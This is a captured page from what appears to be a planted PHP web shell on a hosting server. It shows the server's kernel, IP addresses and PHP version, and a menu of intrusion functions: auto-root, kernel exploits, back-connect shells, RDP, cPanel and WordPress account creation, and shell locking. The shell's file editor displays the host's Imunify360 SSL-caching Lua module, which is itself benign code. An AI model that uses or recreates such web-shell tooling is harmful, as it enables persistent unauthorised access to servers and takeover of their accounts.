Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
676 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
imunify360-webshield /
lualib /
webshield /
[ HOME SHELL ]
Name
Size
Permission
Action
sslutils.lua
3.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sslutils.lua
local ngx_ssl = require('ngx.ssl') local openssl = require('openssl') local lfs = require('lfs') local domains_ips = ngx.shared.domains_ips local ssl_cache_file = '/var/cache/imunify360-webshield/ssl.cache' local notfound_ssl = ngx.shared.notfound_ssl_domains local function split(line, sep, num) local fields = {} local pos = 0 local count = 0 local strlen = line:len() while strlen > pos do local start, stop = line:find(sep, pos) if start == nil then table.insert(fields, line:sub(pos)) break end table.insert(fields, line:sub(pos, start - 1)) pos = stop + 1 count = count + 1 if count == num then table.insert(fields, line:sub(pos)) break end end return fields end local function read_certs(_cache) local f = io.open(ssl_cache_file) if not f then return end local _names = setmetatable({}, {_mode="kv"}) for key, _ in pairs(_cache) do _names[key] = true end for line in f:lines() do local _pair = split(line, ';;', 1) if #_pair ~= 2 then goto continue end _pair[2] = _pair[2]:gsub('\\r\\n', '\\n') -- unifying EOL markers local data = _pair[2]:gsub('\\n', '\n') -- cert itself local bundle = table.concat({data}, "\n") local xcrt = openssl.x509.read(bundle) if not xcrt then ngx.log(ngx.WARN, "Failed to get SSL XCRT (host: ", _pair[1], ")") goto continue end local crt = ngx_ssl.parse_pem_cert(bundle) if not crt then ngx.log(ngx.WARN, "Failed to get SSL CRT (host: ", _pair[1], ")") goto continue end local key = ngx_ssl.parse_pem_priv_key(bundle) if not key then ngx.log(ngx.WARN, "Failed to get SSL KEY (host: ", _pair[1], ")") goto continue end local val = {["xcrt"] = xcrt, ["crt"] = crt, ["key"] = key} _cache[_pair[1]] = val _names[_pair[1]] = nil ::continue:: end for key, _ in pairs(_names) do _cache[key] = nil end f:close() end local function cache_getter() local _cache = {} local _cached_mtime = 0 return function (name, addr) local mtime = lfs.attributes(ssl_cache_file, 'modification') if _cached_mtime ~= mtime then _cached_mtime = mtime read_certs(_cache) notfound_ssl:flush_all() -- clear not_found dict end local dedicated_domain = domains_ips:get(addr) if not name then -- No SNI found ngx.log(ngx.WARN, "Could not get SNI for request (IP: ", addr, ")") if dedicated_domain then name = dedicated_domain end end if name then local cert = _cache[name] if cert then return cert end local notfound_name = notfound_ssl:get(name) -- we didn't find cert for the name earlier if notfound_name then -- so there's no need to look for it again return end for key, cert in pairs(_cache) do if cert["xcrt"]:check_host(name) then return cert end end ngx.log(ngx.WARN, "Certificate not found (host: ", name, ")") ok, err, forced = notfound_ssl:set(name, true, 3600) -- cache name for missing cert for an hour if not ok then ngx.log(ngx.ERR, "Could not cache name (", name, ") of missing cert: ", err) end end end end local get_cert_by_host = cache_getter() return { get_cert_by_host = get_cert_by_host }
Close
